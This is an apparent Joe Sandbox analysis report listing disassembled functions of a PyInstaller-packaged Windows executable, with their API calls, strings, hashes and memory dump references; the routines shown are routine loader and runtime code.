Instruction Fuzzy Hash: CE51B611E9F64281FB509B23E8512BA6291FF98F8CF444031DA0EC66D7EEBCE505A750

Function 00007FF6A29B2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6A29B21AB
SelectObject.GDI32 ref: 00007FF6A29B21F2
DrawTextW.USER32 ref: 00007FF6A29B2215
SelectObject.GDI32 ref: 00007FF6A29B222B
ReleaseDC.USER32 ref: 00007FF6A29B223B
MoveWindow.USER32 ref: 00007FF6A29B228B
MoveWindow.USER32 ref: 00007FF6A29B22CB
MoveWindow.USER32 ref: 00007FF6A29B231E
MoveWindow.USER32 ref: 00007FF6A29B2366

Strings

P%, xrefs: 00007FF6A29B21FF

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: f841521467dec36c14412b2d2a1a9119f7ad6c047c0435c8b8533868c6e05486
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: FA511826608BA186E6349F22E4181BAB7A1F798B65F004135EFDE83795DF7CD045EB10

Function 00007FF6A29B80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6A29B80EF
GetWindowLongPtrW.USER32 ref: 00007FF6A29B816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6A29B8182
GetLastError.KERNEL32 ref: 00007FF6A29B818C
SetWindowLongPtrW.USER32 ref: 00007FF6A29B81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF6A29B8175

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 38752fc627e6edc8395127885aa685957748e0d74624daf422a93771f6423d40
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: B621A621B8BA4282F7418B7BE8541796291FF88F98F484230DA2DC33D7DEACD591A201

Function 00007FF6A29C6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C69CC

Strings

-, xrefs: 00007FF6A29C63D9
p, xrefs: 00007FF6A29C63F5
f, xrefs: 00007FF6A29C6465
p, xrefs: 00007FF6A29C646D
:, xrefs: 00007FF6A29C64FC

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: fc8b5457179fdd74707a3b8e843e8010869bf4c9dd6420c2b9716348524b74b9
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: EB12C472E4E2438EFB286E16D1142797691FBC0F58F944535E68A876C6DFBCF580AB00

Function 00007FF6A29C1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C16DF

Strings

f, xrefs: 00007FF6A29C1110
f, xrefs: 00007FF6A29C117A
p, xrefs: 00007FF6A29C1182
p, xrefs: 00007FF6A29C111D
f, xrefs: 00007FF6A29C12C5

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 1d78862ce419e4756329445e5822a1960ec0c69b870c19dc54f8a04e6809298d
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 30129631E4E1438AFB24AA16E1546797261FB40F5CF984035D699C7AC6DFBCFC80AB18

Function 00007FF6A29B1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6A29B11FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6A29B11F6
malloc, xrefs: 00007FF6A29B110F
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6A29B1098
fseek, xrefs: 00007FF6A29B10D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6A29B10CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6A29B1108

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
Instruction ID: 30ea5a6e5b2fe94dc229a738652b5487460b866e9d55a4276c9e9f7d089418d8
Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
Instruction Fuzzy Hash: 5B416822B8A65286FA10DB13A8556BA6395FF44FC8F844432ED4C87797DFBCE502A740

Function 00007FF6A29B1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6A29B15E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6A29B15DF
malloc, xrefs: 00007FF6A29B151F
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6A29B149F
fseek, xrefs: 00007FF6A29B14E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6A29B14DE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6A29B1518

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
Instruction ID: c47f30c867e7c2ae03e0c6b327bd2d2e15bbf5d481107ccdd0e149c83a63f551
Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
Instruction Fuzzy Hash: 09417E22B8A6429AFA10DB23D4515B97391EF44F9CF444432ED4D87B97DFBCE542A700

Function 00007FF6A29BEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6A29BEAD5

Part of subcall function 00007FF6A29BFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF6A29BFA6F
Part of subcall function 00007FF6A29BFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6A29BFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6A29BEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6A29BEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6A29BEF08

Strings

csm, xrefs: 00007FF6A29BEAEF
csm, xrefs: 00007FF6A29BEB56
csm, xrefs: 00007FF6A29BEBD0

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 898370ea11ac07150cb2a6f53b1968cbe6bdf08a93cbc2c7450484af30ae40a9
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 35D17C32A497418AEB20DB66D4453AD37A4FB45B8CF500136EE8D97B9BDFB8E490D700

Function 00007FF6A29B2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
MessageBoxW.USER32 ref: 00007FF6A29B2D99

Strings

%ls: , xrefs: 00007FF6A29B2D22
<FormatMessageW failed.>, xrefs: 00007FF6A29B2D70
Error, xrefs: 00007FF6A29B2D8C
[PYI-%d:ERROR] , xrefs: 00007FF6A29B2CA6

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: b03ee444e7dfb5ca23af1030333177d7dc886f056d7cf53708ae0acf53684745
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: C031C322B49B4142E620AB26A8542AB6695BF88FDDF400136EF4DD375ADF7CD506D300

Function 00007FF6A29BDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDBD
GetLastError.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE63
GetProcAddress.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE6F

Strings

api-ms-, xrefs: 00007FF6A29BDDDD

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 6fb9187e514338b17109fd4e8eeedf04451747e1992d089788ffda96768a1d8c
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 3131C225B4BA0281EE129B03A81057523D4FF58FA8F494535DD1D8B787EFBCE444A324

Function 00007FF6A29B6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6A29B6446
ucrtbase.dll, xrefs: 00007FF6A29B63CD
LoadLibrary, xrefs: 00007FF6A29B649E
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6A29B63B7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6A29B63F7
Failed to load Python DLL '%ls'., xrefs: 00007FF6A29B6497

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: aa9a573f4e193643605a188e915c880e9098a14ac765e0c876529104bbaf8b20
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 31416531A5EA8791EA11DB22E4552F96351FF44B48F800132EA5DC369BEFBCF605E740

Function 00007FF6A29B2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6A29B351A,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B2AA0

Strings

0, xrefs: 00007FF6A29B2B16
Warning [ANSI Fallback], xrefs: 00007FF6A29B2B0F
Warning, xrefs: 00007FF6A29B2B1E
WARNING, xrefs: 00007FF6A29B2AAF
[PYI-%d:%s] , xrefs: 00007FF6A29B2AA8

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 1830cea742d7ff759bdc423e423cafd9551ad5159999ef12c03b485e4b678c7b
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 8E21A332A5A78182E6209B62F4417E66394FB88BC8F400136EE8C9365ADFBCD5459700

Function 00007FF6A29CB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6A29CB1CF
FlsGetValue.KERNEL32 ref: 00007FF6A29CB1E4
FlsSetValue.KERNEL32 ref: 00007FF6A29CB205
FlsSetValue.KERNEL32 ref: 00007FF6A29CB232
FlsSetValue.KERNEL32 ref: 00007FF6A29CB243
FlsSetValue.KERNEL32 ref: 00007FF6A29CB254
SetLastError.KERNEL32 ref: 00007FF6A29CB26F

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: c20b891bb48f0ce348f93c0f3e3481852e5ce6b0160f645aa80b9a1a8ea36ff4
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: 79219F20E8F2424AFA68A763966527D61435F64FBCF404734D93EC7ADBDEACB440A301

Function 00007FF6A29D7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6A29D7E0D
GetLastError.KERNEL32 ref: 00007FF6A29D7E19
CloseHandle.KERNEL32 ref: 00007FF6A29D7E31
CreateFileW.KERNEL32 ref: 00007FF6A29D7E5C
WriteConsoleW.KERNEL32 ref: 00007FF6A29D7E7B

Strings

CONOUT$, xrefs: 00007FF6A29D7E3D

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 39731ba6fb0802c0d1220f5abc0855caa74505b38164f0b7dc7ad03596006346
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 37114932A59B4286E7508B53E85432963E1FB98FE8F044234EA5DC77A6DFBCD844A740

Function 00007FF6A29B8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B85E9

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B870A

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: 9db512d9e5dc9811b878b40bf45de6b8a1355c29298a3473d900e4f9ea779674
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 1341B462B5A68285EA309B13A5406AA6394FF88FCCF440135DF8DD7B8BDEBCE501D701

Function 00007FF6A29CB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB347
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB37D
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3CC
